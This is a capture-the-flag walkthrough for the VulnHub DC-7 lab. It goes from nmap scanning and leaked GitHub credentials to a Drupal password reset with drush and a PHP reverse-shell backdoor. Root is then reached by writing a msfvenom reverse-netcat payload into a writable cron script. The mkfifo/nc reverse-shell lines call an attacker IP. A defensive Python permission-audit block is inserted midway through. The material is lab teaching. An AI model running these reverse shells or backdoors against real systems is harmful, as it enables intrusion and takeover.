DC:7 writeup: another CTF challenge for CTF players, which can be downloaded from VulnHub here. Credit goes to “DCAU” for designing this VM for beginners. This is a Linux-based CTF challenge where you can use your basic pentest skills to compromise the VM and escalate to a root privilege shell.
Penetration Testing Methodologies
Network Scan
· Nmap
Footprinting
Exploiting
· SSH login
· Abusing Drupal Drush
· Compromising webshell via PHP backdoor
Privilege Escalation
· Abusing writable script
· Capture the flag
Walkthrough
Network Scanning
Let's start with an aggressive Nmap scan, as we always do; this time we follow the same approach to identify open ports and the services running on them.
nmap -A 192.168.1.101
Hmmm! Nmap showed a very exciting and cool outcome, specifically on port 80, which serves HTTP and hosts a Drupal CMS; additionally, the 15 entries in robots.txt are the cherry on the cake.
Enumeration
Next, we need to start enumeration against the host machine, so without wasting time we open a web browser to explore the HTTP service. The DC-7 welcome page opens in the browser and gives us a hint to search “outside the box”, which may mean looking on the internet.
At the end of this web page we observed another hint, “@DC7User”, which could be a username.
Following the hint above, we start footprinting on @DC7User and find the DC7User Twitter account. This account contains a link to GitHub: https://github.com/Dc7User; maybe the author was pointing us to this link.
The GitHub URL contains a repository named staffdb, which holds PHP code.
When we opened staffdb, config.php looked the most interesting, along with a note reading as depicted below:
“This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge. This isn't a flag, btw, but if you have made it here, well done anyway. :-)”
We found credentials inside config.php as shown below:
Username: dc7user
Password: MdR3xOgB7#dW
With the help of the enumerated credentials we connect over SSH, and after obtaining a TTY shell we start post-enumeration by traversing directories.
First, while listing the directory, we found a file named "mbox" that contains an inbox message. The message names /opt/scripts/backup.sh in its subject, so let's explore it further.
Inside backup.sh we notice it uses drush, which stands for Drupal shell: a command-line utility used to manage the Drupal CMS.
So I searched for drush commands on Google and found the command used to change an account's password. Therefore, we change the admin password using the command below:
drush user-password admin --password=raj
Now that we've changed the admin account's password, we log in to Drupal and explore the following URL:
After accessing the admin console, it was time to exploit the web application by injecting malicious content into it. Directly writing malicious scripts as web content will not give us a reverse shell from the application; after spending some time, we concluded that it requires the PHP module. We therefore install a new module through Manage > Extend > List > Install new module.
You can download the PHP package for Drupal from the URL
below and upload the tar file to install the new module.
https://www.drupal.org/project/php
Once the installation is complete, we need to enable the added module.
Again, go to Manage > Extend > Filters and enable the checkbox for PHP filter.
Now use the Pentest Monkey PHP script, i.e. “reverse_shell_backdoor.php”, injected as basic content. Do not forget to set the listening IP and port for the reverse connection. Then change the text format to PHP and enable the Published checkbox. Keep the netcat listener running to receive the incoming shell.
When everything is set correctly, click the preview button and you'll get the reverse connection on netcat.
Great!! We have our netcat session as www-data, and if you check the permissions on /opt/scripts/backup.sh you will notice that www-data has full permission to read and modify this file. We can therefore abuse these file permissions to escalate privileges by modifying the contents of the script.
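As an added defender-side check (not part of the original writeup), the following Python audit flags scripts referenced from cron entries that a non-root user could modify, which is exactly the condition found on /opt/scripts/backup.sh above. The crontab text, the file names and the temporary directory are constructed for the demo; a parent-directory check is included because a writable directory lets the file be replaced even when the file itself is read-only.

```python
# Added example, not code from the DC-7 writeup: audit cron-referenced
# scripts for permissions that let an unprivileged user alter them.
import os
import re
import stat
import tempfile
from pathlib import Path

def file_findings(path, trusted_uids=(0,)):
    """Return reasons `path` is unsafe to run as root (empty list = fine)."""
    findings = []
    p = Path(path)
    st = p.stat()
    if st.st_uid not in trusted_uids:
        findings.append(f"owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    # A world-writable parent without the sticky bit allows rename/unlink,
    # so the script can be swapped out even if its own mode is 0755.
    for parent in p.resolve().parents:
        pm = parent.stat().st_mode
        if (pm & stat.S_IWOTH) and not (pm & stat.S_ISVTX):
            findings.append(f"parent {parent} is world-writable without sticky bit")
    return findings

ABS_PATH = re.compile(r"(/[\w./-]+)")

def audit_crontab(crontab_text, trusted_uids=(0,)):
    """Map every existing regular file named in a crontab to its findings."""
    report = {}
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for path in ABS_PATH.findall(line):   # "*/15" yields "/15", skipped below
            if os.path.isfile(path) and path not in report:
                report[path] = file_findings(path, trusted_uids)
    return report

def demo():
    """Constructed scenario: a 0777 backup script beside a 0755 one."""
    d = tempfile.mkdtemp()                    # created 0700, so no parent finding
    bad, good = os.path.join(d, "backup.sh"), os.path.join(d, "rotate.sh")
    for f in (bad, good):
        Path(f).write_text("#!/bin/bash\necho backup\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    crontab = f"# constructed root crontab\n*/15 * * * * root {bad}\n0 3 * * * root {good} > /dev/null\n"
    # We own the files we just created, so treat our own uid as trusted here.
    return audit_crontab(crontab, trusted_uids=(os.getuid(),))
```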
Privilege Escalation
As said above, we'll abuse the writable permission assigned to the script. Thus, we use msfvenom to generate a malicious piece of code for obtaining a bash shell.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.106 lport=8888 R
Now copy the generated code and start another netcat listener in a new terminal.
mkfifo /tmp/ulgg; nc 192.168.1.106 8888 0
Paste the code copied above into the previous netcat session under the www-data shell, wait a while, and go back to the other netcat listener.
After some time, you will have access to the root shell, and you will find the final flag in the root directory as shown below.